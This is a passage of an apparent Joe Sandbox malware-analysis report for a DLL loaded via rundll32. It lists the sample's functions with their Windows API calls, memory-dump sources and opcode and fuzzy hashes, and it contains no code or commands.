                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B564, Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __msize_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1288803200-0
                                                                                                          • Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
                                                                                                          • Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100210FF, Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$__cftof
                                                                                                          • String ID:
                                                                                                          • API String ID: 887240167-0
                                                                                                          • Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
                                                                                                          • Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10023180, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 100231B0
                                                                                                          • LockResource.KERNEL32(00000000), ref: 100231C2
                                                                                                          • FreeResource.KERNEL32(00000000), ref: 10023210
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
                                                                                                          • Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
                                                                                                          • Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
                                                                                                          • Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
                                                                                                          • Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10024E13, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10024E1A
                                                                                                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10024E50
                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004DCF4,00000004,1000166C,8007000E), ref: 10024E7B
                                                                                                            • Part of subcall function 10023B77: __cftof.LIBCMT ref: 10023B88
                                                                                                          • LocalFree.KERNEL32(8007000E,8007000E), ref: 10024EA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1808948168-0
                                                                                                          • Opcode ID: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
                                                                                                          • Instruction ID: b82dd79aa3f9a22217a6a5774d94273f1735641f27abfa85c715a235195ff0cc
                                                                                                          • Opcode Fuzzy Hash: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
                                                                                                          • Instruction Fuzzy Hash: 2711C6B1604249BFEF01DFA4DC81DAE3BA9FF08350F628529F619CB1A1DB319950CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100217AE, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 100217B5
                                                                                                            • Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4
                                                                                                          • __strdup.LIBCMT ref: 100217D7
                                                                                                          • GetCurrentThread.KERNEL32 ref: 10021804
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 1002180D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                          • String ID:
                                                                                                          • API String ID: 4206445780-0
                                                                                                          • Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
                                                                                                          • Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10029178, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 100291A4
                                                                                                          • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 100291CF
                                                                                                          • GetCapture.USER32 ref: 100291E1
                                                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 100291F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Capture
                                                                                                          • String ID:
                                                                                                          • API String ID: 1665607226-0
                                                                                                          • Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
                                                                                                          • Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002ABD3, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
                                                                                                          • swprintf.LIBCMT ref: 1002AC34
                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 22681860-0
                                                                                                          • Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
                                                                                                          • Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027E7D, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027E8D
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027ECC
                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 10027EEA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window
                                                                                                          • String ID:
                                                                                                          • API String ID: 2353593579-0
                                                                                                          • Opcode ID: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
                                                                                                          • Instruction ID: 7c1aa0b4fd0438a3880c8a8454d512b9e221987d8156c76486bb18807498cd50
                                                                                                          • Opcode Fuzzy Hash: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
                                                                                                          • Instruction Fuzzy Hash: 8101D33640062ABBDF139FA1AD05E9F3B6AFF492A0F424054FE1851060D736C961EBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003B5D6, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027839, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32 ref: 10027846
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027859
                                                                                                            • Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0
                                                                                                          • GetTopWindow.USER32(?), ref: 10027889
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item
                                                                                                          • String ID:
                                                                                                          • API String ID: 369458955-0
                                                                                                          • Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
                                                                                                          • Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A257, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
                                                                                                          • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
                                                                                                          • Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
                                                                                                          • Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001310, Relevance: 6.0, APIs: 4, Instructions: 41networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memsethtonsinet_addrsendto
                                                                                                          • String ID:
                                                                                                          • API String ID: 1158618643-0
                                                                                                          • Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
                                                                                                          • Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10023584, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,A72075DA), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,A72075DA), ref: 100235D9
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ActiveEnable$FreeResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 253586258-0
                                                                                                          • Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
                                                                                                          • Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100337CF, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 100337DB
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 100337F2
                                                                                                          • __amsg_exit.LIBCMT ref: 10033800
                                                                                                          • __lock.LIBCMT ref: 10033810
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3521780317-0
                                                                                                          • Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
                                                                                                          • Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002173A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
                                                                                                          • PathFindExtensionA.SHLWAPI(?), ref: 10021778
                                                                                                            • Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                            • Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
